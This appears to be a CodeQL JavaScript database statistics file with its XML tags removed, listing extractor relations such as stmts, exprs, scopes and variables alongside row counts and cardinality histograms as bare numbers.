-56 -21060 - - -56 -237 -20821 - - -237 -134470 -4919 - - - - - - -endLine -file - - -12 - - -1 -2 -117975 - - -2 -3 -120803 - - -3 -8 -21076 - - -8 -6458 -17551 - - - - - - -endLine -beginLine - - -12 - - -1 -2 -243883 - - -2 -4 -23431 - - -4 -71 -10091 - - - - - - -endLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19057 - - -11 -12 -32046 - - -12 -15 -18779 - - -15 -17 -18710 - - -17 -21 -21785 - - -21 -31 -21103 - - -31 -63 -20930 - - -63 -94454 -7829 - - - - - - -endLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -21177 - - -12 -13 -28718 - - -13 -16 -19585 - - -16 -18 -21210 - - -18 -23 -23344 - - -23 -35 -21013 - - -35 -80 -20938 - - -80 -94454 -4254 - - - - - - -endColumn -id - - -12 - - -1 -2 -4439 - - -2 -3 -8489 - - -3 -4 -12884 - - -4 -5 -16048 - - -5 -6 -15554 - - -6 -7 -12546 - - -7 -8 -9231 - - -8 -9 -6405 - - -9 -11 -9266 - - -11 -14 -10367 - - -14 -20 -9186 - - -20 -489713 -3453 - - - - - - -endColumn -file - - -12 - - -1 -2 -68569 - - -2 -3 -15919 - - -3 -4 -7876 - - -4 -5 -9221 - - -5 -6 -8062 - - -6 -6458 -8221 - - - - - - -endColumn -beginLine - - -12 - - -1 -2 -6848 - - -2 -3 -15273 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10857 - - -9 -11 -9251 - - -11 -1768 -8841 - - -1780 -212575 -199 - - - - - - -endColumn -beginColumn - - -12 - - -1 -2 -15842 - - -2 -3 -27460 - - -3 -4 -26707 - - -4 -5 -18639 - - -5 -6 -11518 - - -6 -8 -10766 - - -8 -265 -6936 - - - - - - -endColumn -endLine - - -12 - - -1 -2 -6850 - - -2 -3 -15271 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10858 - - -9 -11 -9252 - - -11 -1789 -8841 - - -1795 -212360 -197 - - - - - - - - -numlines -122044 - - -element_id -122044 - - -num_lines -1136 - - -num_code -939 - - -num_comment -418 - - - - -element_id -num_lines - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_code - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_comment - - -12 - - -1 -2 -122044 - - - - - - -num_lines -element_id - - -12 - - -1 -2 -399 - - -2 -3 -144 - - -3 -4 -97 - - -4 -6 -91 - - -6 -9 -86 - - -9 -15 -90 - - -15 -36 -86 - - -36 -174 -86 - - -175 -21589 -57 - - - - - - -num_lines -num_code - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -95 - - -4 -6 -87 - - -6 -9 -85 - - -9 -14 -88 - - -14 -24 -90 - - -24 -33 -89 - - -33 -38 -18 - - - - - - -num_lines -num_comment - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -94 - - -4 -6 -92 - - -6 -9 -90 - - -9 -14 -90 - - -14 -20 -89 - - -20 -27 -89 - - -27 -30 -8 - - - - - - -num_code -element_id - - -12 - - -1 -2 -317 - - -2 -3 -125 - - -3 -4 -67 - - -4 -5 -61 - - -5 -8 -67 - - -8 -12 -73 - - -12 -26 -72 - - -26 -69 -71 - - -69 -1540 -71 - - -1747 -22000 -15 - - - - - - -num_code -num_lines - - -12 - - -1 -2 -349 - - -2 -3 -118 - - -3 -4 -77 - - -4 -6 -76 - - -6 -10 -84 - - -10 -19 -78 - - -19 -31 -79 - - -31 -44 -73 - - -44 -52 -5 - - - - - - -num_code -num_comment - - -12 - - -1 -2 -347 - - -2 -3 -121 - - -3 -4 -79 - - -4 -6 -74 - - -6 -9 -74 - - -9 -16 -80 - - -16 -23 -72 - - -23 -31 -76 - - -31 -40 -16 - - - - - - -num_comment -element_id - - -12 - - -1 -2 -147 - - -2 -3 -67 - - -3 -4 -26 - - -4 -5 -26 - - -5 -7 -32 - - -7 -12 -34 - - -12 -32 -34 - - -33 -135 -32 - - -150 -93795 -20 - - - - - - -num_comment -num_lines - - -12 - - -1 -2 -171 - - -2 -3 -57 - - -3 -4 -32 - - -4 -5 -24 - - -5 -8 -33 - - -8 -18 -35 - - -19 -47 -32 - - -52 -253 -33 - - -362 -363 -1 - - - - - - -num_comment -num_code - - -12 - - -1 -2 -174 - - -2 -3 -54 - - -3 -4 -33 - - -4 -5 -22 - - -5 -8 -33 - - -8 -18 -36 - - -19 -47 -32 - - -51 -230 -32 - - -232 -346 -2 - - - - - - - - -files -id -6457 - - -id -6457 - - -name -6457 - - - - -id -name - - -12 - - -1 -2 -6457 - - - - - - -name -id - - -12 - - -1 -2 -6457 - - - - - - - - -folders -id -1590 - - -id -1590 - - -name -1590 - - - - -id -name - - -12 - - -1 -2 -1590 - - - - - - -name -id - - -12 - - -1 -2 -1590 - - - - - - - - -containerparent -child -8046 - - -parent -1590 - - -child -8046 - - - - -parent -child - - -12 - - -1 -2 -525 - - -2 -3 -326 - - -3 -4 -207 - - -4 -5 -128 - - -5 -7 -138 - - -7 -11 -132 - - -11 -53 -120 - - -60 -335 -14 - - - - - - -child -parent - - -12 - - -1 -2 -8046 - - - - - - - - -externalData -5684 - - -id -950 - - -path -3 - - -column -6 - - -value -790 - - - - -id -path - - -12 - - -1 -2 -950 - - - - - - -id -column - - -12 - - -2 -3 -4 - - -6 -7 -946 - - - - - - -id -value - - -12 - - -2 -6 -8 - - -6 -7 -942 - - - - - - -path -id - - -12 - - -4 -5 -1 - - -72 -73 -1 - - -874 -875 -1 - - - - - - -path -column - - -12 - - -2 -3 -1 - - -6 -7 -2 - - - - - - -path -value - - -12 - - -8 -9 -1 - - -86 -87 -1 - - -722 -723 -1 - - - - - - -column -id - - -12 - - -946 -947 -4 - - -950 -951 -2 - - - - - - -column -path - - -12 - - -2 -3 -4 - - -3 -4 -2 - - - - - - -column -value - - -12 - - -2 -3 -1 - - -6 -7 -1 - - -31 -32 -1 - - -93 -94 -1 - - -117 -118 -1 - - -620 -621 -1 - - - - - - -value -id - - -12 - - -1 -2 -478 - - -2 -3 -132 - - -3 -5 -69 - - -5 -16 -61 - - -16 -928 -50 - - - - - - -value -path - - -12 - - -1 -2 -764 - - -2 -3 -26 - - - - - - -value -column - - -12 - - -1 -2 -711 - - -2 -3 -79 - - - - - - - - -sourceLocationPrefix -1 - - -prefix -1 - - - - - -toplevels -id -5320 - - -id -5320 - - -kind -4 - - - - -id -kind - - -12 - - -1 -2 -5320 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -31 -32 -1 - - -86 -87 -1 - - -5200 -5201 -1 - - - - - - - - -is_externs -44 - - -toplevel -44 - - - - - -is_instantiated -5 - - -decl -5 - - - - - -has_declare_keyword -66 - - -stmt -66 - - - - - -has_asserts_keyword -66 - - -node -66 - - - - - -is_abstract_member -66 - - -id -66 - - - - - -has_public_keyword -9297 - - -id -9297 - - - - - -has_private_keyword -11391 - - -id -11391 - - - - - -has_protected_keyword -1048 - - -id -1048 - - - - - -has_readonly_keyword -2338 - - -id -2338 - - - - - -has_type_keyword -1000 - - -id -1000 - - - - - -is_optional_member -3668 - - -id -3668 - - - - - -has_definite_assignment_assertion -100 - - -id -100 - - - - - -is_optional_parameter_declaration -3966 - - -parameter -3966 - - - - - -parameter_fields -2693 - - -field -2693 - - -constructor -1020 - - -param_index -20 - - - - -field -constructor - - -12 - - -1 -2 -2693 - - - - - - -field -param_index - - -12 - - -1 -2 -2693 - - - - - - -constructor -field - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -constructor -param_index - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -param_index -field - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - -param_index -constructor - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - - - -is_const_enum -62 - - -id -62 - - - - - -is_abstract_class -116 - - -id -116 - - - - - -typeexprs -54050 - - -id -54050 - - -kind -6 - - -parent -29264 - - -idx -26 - - -tostring -3278 - - - - -id -kind - - -12 - - -1 -2 -54050 - - - - - - -id -parent - - -12 - - -1 -2 -54050 - - - - - - -id -idx - - -12 - - -1 -2 -54050 - - - - - - -id -tostring - - -12 - - -1 -2 -54050 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -25306 -25307 -1 - - -25491 -25492 -1 - - - - - - -kind -parent - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -16661 -16662 -1 - - -17601 -17602 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -4 -5 -1 - - -19 -20 -1 - - -25 -26 -1 - - - - - - -kind -tostring - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -9 -10 -1 - - -242 -243 -1 - - -2075 -2076 -1 - - -2322 -2323 -1 - - - - - - -parent -id - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -kind - - -12 - - -1 -2 -21285 - - -2 -3 -7707 - - -3 -4 -272 - - - - - - -parent -idx - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -tostring - - -12 - - -1 -2 -16315 - - -2 -3 -8432 - - -3 -4 -3126 - - -4 -22 -1391 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -7 - - -2 -3 -14 - - -3 -4 -2 - - -4 -5 -3 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -6 -2 - - -9 -10 -2 - - -12 -17 -2 - - -18 -26 -2 - - -28 -31 -2 - - -37 -44 -2 - - -60 -71 -2 - - -108 -196 -2 - - -395 -667 -2 - - -746 -978 -2 - - -1522 -2076 -2 - - - - - - -tostring -id - - -12 - - -1 -2 -1085 - - -2 -3 -627 - - -3 -4 -344 - - -4 -5 -322 - - -5 -7 -292 - - -7 -12 -260 - - -12 -45 -247 - - -45 -7788 -101 - - - - - - -tostring -kind - - -12 - - -1 -2 -1903 - - -2 -3 -1375 - - - - - - -tostring -parent - - -12 - - -1 -2 -1097 - - -2 -3 -631 - - -3 -4 -341 - - -4 -5 -327 - - -5 -7 -292 - - -7 -12 -253 - - -12 -48 -246 - - -48 -6190 -91 - - - - - - -tostring -idx - - -12 - - -1 -2 -1450 - - -2 -3 -939 - - -3 -4 -481 - - -4 -6 -289 - - -6 -19 -119 - - - - - - - - -is_for_await_of -1 - - -forof -1 - - - - - -is_module -21 - - -tl -21 - - - - - -is_es2015_module -21 - - -tl -21 - - - - - -is_closure_module -21 - - -tl -21 - - - - - -toplevel_parent_xml_node -43 - - -toplevel -43 - - -xmlnode -43 - - - - -toplevel -xmlnode - - -12 - - -1 -2 -43 - - - - - - -xmlnode -toplevel - - -12 - - -1 -2 -43 - - - - - - - - -xml_element_parent_expression -1 - - -xmlnode -1 - - -expression -1 - - -index -1 - - - - -xmlnode -expression - - -12 - - -1 -2 -1 - - - - - - -xmlnode -index - - -12 - - -1 -2 -1 - - - - - - -expression -xmlnode - - -12 - - -1 -2 -1 - - - - - - -expression -index - - -12 - - -1 -2 -1 - - - - - - -index -xmlnode - - -12 - - -1 -2 -1 - - - - - - -index -expression - - -12 - - -1 -2 -1 - - - - - - - - -is_nodejs -12 - - -tl -12 - - - - - -stmts -id -1096691 - - -id -1096691 - - -kind -31 - - -parent -412140 - - -idx -152947 - - -tostring -284956 - - - - -id -kind - - -12 - - -1 -2 -1096691 - - - - - - -id -parent - - -12 - - -1 -2 -1096691 - - - - - - -id -idx - - -12 - - -1 -2 -1096691 - - - - - - -id -tostring - - -12 - - -1 -2 -1096691 - - - - - - -kind -id - - -12 - - -1 -2 -3 - - -3 -5 -2 - - -5 -9 -2 - - -31 -42 -2 - - -61 -552 -2 - - -1118 -1137 -2 - - -1272 -1316 -2 - - -1316 -1379 -2 - - -1471 -1570 -2 - - -1642 -2306 -2 - - -3120 -5386 -2 - - -8674 -10150 -2 - - -16771 -48210 -2 - - -68214 -105607 -2 - - -204994 -610341 -2 - - - - - - -kind -parent - - -12 - - -1 -2 -4 - - -3 -5 -2 - - -5 -6 -2 - - -35 -59 -2 - - -298 -424 -2 - - -738 -1157 -2 - - -1253 -1263 -2 - - -1271 -1321 -2 - - -1495 -1568 -2 - - -1642 -2306 -2 - - -2999 -4416 -2 - - -4734 -10123 -2 - - -48139 -48347 -2 - - -50857 -162082 -2 - - -191077 -191078 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -2 - - -8 -9 -2 - - -10 -12 -2 - - -16 -22 -2 - - -28 -32 -2 - - -36 -37 -2 - - -39 -51 -2 - - -54 -63 -2 - - -65 -67 -2 - - -116 -118 -2 - - -122 -138 -2 - - -251 -1564 -2 - - -1967 -152946 -2 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -2 -3 -2 - - -4 -11 -2 - - -12 -17 -2 - - -88 -104 -2 - - -147 -168 -2 - - -239 -296 -2 - - -356 -428 -2 - - -591 -705 -2 - - -811 -829 -2 - - -1092 -2254 -2 - - -2665 -10292 -2 - - -18023 -21916 -2 - - -43911 -180066 -2 - - - - - - -parent -id - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -kind - - -12 - - -1 -2 -319546 - - -2 -3 -67918 - - -3 -23 -24676 - - - - - - -parent -idx - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -tostring - - -12 - - -1 -2 -275359 - - -2 -3 -62818 - - -3 -4 -25781 - - -4 -8 -34293 - - -8 -19511 -13889 - - - - - - -idx -id - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -kind - - -12 - - -1 -2 -149940 - - -2 -28 -3007 - - - - - - -idx -parent - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -tostring - - -12 - - -1 -2 -149939 - - -2 -88922 -3008 - - - - - - -tostring -id - - -12 - - -1 -2 -186537 - - -2 -3 -48494 - - -3 -5 -24651 - - -5 -37 -21526 - - -37 -72175 -3748 - - - - - - -tostring -kind - - -12 - - -1 -2 -284895 - - -2 -4 -61 - - - - - - -tostring -parent - - -12 - - -1 -2 -195596 - - -2 -3 -45562 - - -3 -5 -23127 - - -5 -66340 -20671 - - - - - - -tostring -idx - - -12 - - -1 -2 -225945 - - -2 -3 -33948 - - -3 -13 -21496 - - -13 -903 -3567 - - - - - - - - -stmt_containers -1096691 - - -stmt -1096691 - - -container -120740 - - - - -stmt -container - - -12 - - -1 -2 -1096691 - - - - - - -container -stmt - - -12 - - -1 -2 -6778 - - -2 -3 -35010 - - -3 -4 -16178 - - -4 -5 -12184 - - -5 -6 -9476 - - -6 -7 -7569 - - -7 -9 -10084 - - -9 -13 -10057 - - -13 -27 -9196 - - -27 -152947 -4208 - - - - - - - - -jump_targets -11791 - - -jump -11791 - - -target -4873 - - - - -jump -target - - -12 - - -1 -2 -11791 - - - - - - -target -jump - - -12 - - -1 -2 -2542 - - -2 -3 -1106 - - -3 -4 -505 - - -4 -6 -410 - - -6 -260 -310 - - - - - - - - -exprs -id -5495305 - - -id -5495305 - - -kind -85 - - -parent -3130204 - - -idx -17698 - - -tostring -834491 - - - - -id -kind - - -12 - - -1 -2 -5495305 - - - - - - -id -parent - - -12 - - -1 -2 -5495305 - - - - - - -id -idx - - -12 - - -1 -2 -5495305 - - - - - - -id -tostring - - -12 - - -1 -2 -5495305 - - - - - - -kind -id - - -12 - - -1 -4 -7 - - -4 -45 -7 - - -50 -97 -7 - - -108 -458 -7 - - -503 -824 -7 - - -1135 -2497 -7 - - -2527 -5439 -7 - - -5655 -10255 -7 - - -10789 -15893 -7 - - -17758 -42854 -7 - - -50958 -130844 -7 - - -245084 -722374 -7 - - -1295408 -1295409 -1 - - - - - - -kind -parent - - -12 - - -1 -3 -7 - - -3 -45 -7 - - -47 -93 -7 - - -106 -407 -7 - - -457 -809 -7 - - -1108 -2420 -7 - - -2502 -5349 -7 - - -5453 -10133 -7 - - -10658 -15697 -7 - - -16273 -36888 -7 - - -41849 -128642 -7 - - -199566 -722374 -7 - - -1171898 -1171899 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -7 - - -2 -3 -12 - - -3 -4 -11 - - -4 -5 -7 - - -5 -6 -7 - - -6 -7 -3 - - -7 -8 -7 - - -8 -11 -6 - - -12 -18 -7 - - -20 -64 -7 - - -82 -395 -7 - - -431 -13375 -4 - - - - - - -kind -tostring - - -12 - - -1 -2 -7 - - -2 -6 -7 - - -8 -37 -7 - - -38 -126 -7 - - -142 -304 -7 - - -358 -721 -7 - - -811 -1485 -7 - - -1523 -2918 -7 - - -3305 -5078 -7 - - -5422 -9940 -7 - - -10536 -40606 -7 - - -46227 -123090 -7 - - -128754 -128755 -1 - - - - - - -parent -id - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -kind - - -12 - - -1 -2 -1300246 - - -2 -3 -1747609 - - -3 -8 -82349 - - - - - - -parent -idx - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -tostring - - -12 - - -1 -2 -1108803 - - -2 -3 -1870864 - - -3 -17526 -150537 - - - - - - -idx -id - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -kind - - -12 - - -1 -2 -10648 - - -2 -3 -6398 - - -3 -83 -652 - - - - - - -idx -parent - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -tostring - - -12 - - -1 -2 -4093 - - -2 -3 -1365 - - -3 -4 -2014 - - -4 -5 -1147 - - -5 -6 -1529 - - -6 -7 -5401 - - -7 -10 -1499 - - -10 -573348 -650 - - - - - - -tostring -id - - -12 - - -1 -2 -466570 - - -2 -3 -157949 - - -3 -4 -55443 - - -4 -6 -61411 - - -6 -17 -63412 - - -17 -128652 -29706 - - - - - - -tostring -kind - - -12 - - -1 -2 -772624 - - -2 -24 -61867 - - - - - - -tostring -parent - - -12 - - -1 -2 -467110 - - -2 -3 -158201 - - -3 -4 -55446 - - -4 -6 -61061 - - -6 -17 -63168 - - -17 -128642 -29505 - - - - - - -tostring -idx - - -12 - - -1 -2 -724438 - - -2 -3 -86524 - - -3 -7765 -23529 - - - - - - - - -literals -expr -3145090 - - -value -216517 - - -raw -234110 - - -expr -3145090 - - - - -value -raw - - -12 - - -1 -2 -201221 - - -2 -25 -15296 - - - - - - -value -expr - - -12 - - -1 -2 -95821 - - -2 -3 -41222 - - -3 -4 -19627 - - -4 -5 -16097 - - -5 -9 -18825 - - -9 -31 -16474 - - -31 -122435 -8451 - - - - - - -raw -value - - -12 - - -1 -2 -234110 - - - - - - -raw -expr - - -12 - - -1 -2 -104635 - - -2 -3 -47230 - - -3 -4 -20082 - - -4 -5 -16835 - - -5 -9 -19610 - - -9 -34 -17695 - - -34 -120241 -8023 - - - - - - -expr -value - - -12 - - -1 -2 -3145090 - - - - - - -expr -raw - - -12 - - -1 -2 -3145090 - - - - - - - - -enclosing_stmt -5372899 - - -expr -5372899 - - -stmt -854574 - - - - -expr -stmt - - -12 - - -1 -2 -5372899 - - - - - - -stmt -expr - - -12 - - -1 -3 -74578 - - -3 -4 -254844 - - -4 -5 -57228 - - -5 -6 -136234 - - -6 -7 -44557 - - -7 -8 -79401 - - -8 -9 -55420 - - -9 -11 -63155 - - -11 -17 -65146 - - -17 -88321 -24011 - - - - - - - - -expr_containers -5495305 - - -expr -5495305 - - -container -118511 - - - - -expr -container - - -12 - - -1 -2 -5495305 - - - - - - -container -expr - - -12 - - -1 -4 -7197 - - -4 -6 -9110 - - -6 -8 -9222 - - -8 -10 -8424 - - -10 -13 -10651 - - -13 -16 -8706 - - -16 -20 -9358 - - -20 -25 -9955 - - -25 -31 -8893 - - -31 -40 -9356 - - -40 -54 -9017 - - -54 -85 -8935 - - -85 -484 -8890 - - -484 -459128 -797 - - - - - - - - -array_size -28188 - - -ae -28188 - - -sz -118 - - - - -ae -sz - - -12 - - -1 -2 -28188 - - - - - - -sz -ae - - -12 - - -1 -2 -52 - - -2 -3 -21 - - -3 -5 -9 - - -5 -8 -9 - - -9 -20 -9 - - -22 -181 -9 - - -231 -12345 -9 - - - - - - - - -is_delegating -4 - - -yield -4 - - - - - -expr_contains_template_tag_location -31 - - -expr -31 - - -location -31 - - - - -expr -location - - -12 - - -1 -2 -31 - - - - - - -location -expr - - -12 - - -1 -2 -31 - - - - - - - - -template_placeholder_tag_info -283 - - -node -283 - - -parentNode -92 - - -raw -24 - - - - -node -parentNode - - -12 - - -1 -2 -283 - - - - - - -node -raw - - -12 - - -1 -2 -283 - - - - - - -parentNode -node - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -5 -6 -9 - - -6 -7 -4 - - -7 -8 -13 - - -9 -11 -4 - - - - - - -parentNode -raw - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -4 -5 -11 - - -5 -6 -13 - - -6 -11 -6 - - - - - - -raw -node - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -45 -2 - - -82 -83 -1 - - - - - - -raw -parentNode - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -41 -2 - - -44 -45 -1 - - - - - - - - -scopes -id -118172 - - -id -118172 - - -kind -8 - - - - -id -kind - - -12 - - -1 -2 -118172 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -4 -5 -1 - - -17 -18 -1 - - -21 -22 -1 - - -28 -29 -1 - - -584 -585 -1 - - -1272 -1273 -1 - - -116245 -116246 -1 - - - - - - - - -scopenodes -118171 - - -node -118171 - - -scope -118171 - - - - -node -scope - - -12 - - -1 -2 -118171 - - - - - - -scope -node - - -12 - - -1 -2 -118171 - - - - - - - - -scopenesting -118171 - - -inner -118171 - - -outer -33143 - - - - -inner -outer - - -12 - - -1 -2 -118171 - - - - - - -outer -inner - - -12 - - -1 -2 -17868 - - -2 -3 -6196 - - -3 -4 -2666 - - -4 -6 -2791 - - -6 -13 -2584 - - -13 -17277 -1038 - - - - - - - - -is_generator -62 - - -fun -62 - - - - - -has_rest_parameter -33 - - -fun -33 - - - - - -is_async -50 - - -fun -50 - - - - - -variables -id -364388 - - -id -364388 - - -name -56559 - - -scope -118168 - - - - -id -name - - -12 - - -1 -2 -364388 - - - - - - -id -scope - - -12 - - -1 -2 -364388 - - - - - - -name -id - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -name -scope - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -scope -id - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - -scope -name - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - - - -local_type_names -23565 - - -id -23565 - - -name -6080 - - -scope -1614 - - - - -id -name - - -12 - - -1 -2 -23565 - - - - - - -id -scope - - -12 - - -1 -2 -23565 - - - - - - -name -id - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -name -scope - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -scope -id - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - -scope -name - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - - - -local_namespace_names -20832 - - -id -20832 - - -name -4078 - - -scope -1543 - - - - -id -name - - -12 - - -1 -2 -20832 - - - - - - -id -scope - - -12 - - -1 -2 -20832 - - - - - - -name -id - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -name -scope - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -scope -id - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - -scope -name - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - - - -is_arguments_object -116243 - - -id -116243 - - - - - -bind -1295408 - - -id -1295408 - - -decl -224900 - - - - -id -decl - - -12 - - -1 -2 -1295408 - - - - - - -decl -id - - -12 - - -1 -2 -81789 - - -2 -3 -50824 - - -3 -4 -29919 - - -4 -5 -17755 - - -5 -7 -16901 - - -7 -14 -17790 - - -14 -98305 -9922 - - - - - - - - -decl -250257 - - -id -250257 - - -decl -246998 - - - - -id -decl - - -12 - - -1 -2 -250257 - - - - - - -decl -id - - -12 - - -1 -2 -245772 - - -2 -283 -1226 - - - - - - - - -typebind -36216 - - -id -36216 - - -decl -12650 - - - - -id -decl - - -12 - - -1 -2 -36216 - - - - - - -decl -id - - -12 - - -1 -2 -6781 - - -2 -3 -2435 - - -3 -4 -1133 - - -4 -6 -1127 - - -6 -17 -954 - - -17 -524 -220 - - - - - - - - -typedecl -23573 - - -id -23573 - - -decl -23565 - - - - -id -decl - - -12 - - -1 -2 -23573 - - - - - - -decl -id - - -12 - - -1 -2 -23558 - - -2 -4 -7 - - - - - - - - -namespacedecl -20839 - - -id -20839 - - -decl -20832 - - - - -id -decl - - -12 - - -1 -2 -20839 - - - - - - -decl -id - - -12 - - -1 -2 -20828 - - -2 -5 -4 - - - - - - - - -namespacebind -4300 - - -id -4300 - - -decl -485 - - - - -id -decl - - -12 - - -1 -2 -4300 - - - - - - -decl -id - - -12 - - -1 -2 -133 - - -2 -3 -46 - - -3 -4 -56 - - -4 -5 -30 - - -5 -7 -37 - - -7 -9 -44 - - -9 -12 -41 - - -12 -17 -38 - - -17 -31 -37 - - -32 -287 -23 - - - - - - - - -properties -id -142723 - - -id -142723 - - -parent -45129 - - -index -4204 - - -kind -3 - - -tostring -67703 - - - - -id -parent - - -12 - - -1 -2 -142723 - - - - - - -id -index - - -12 - - 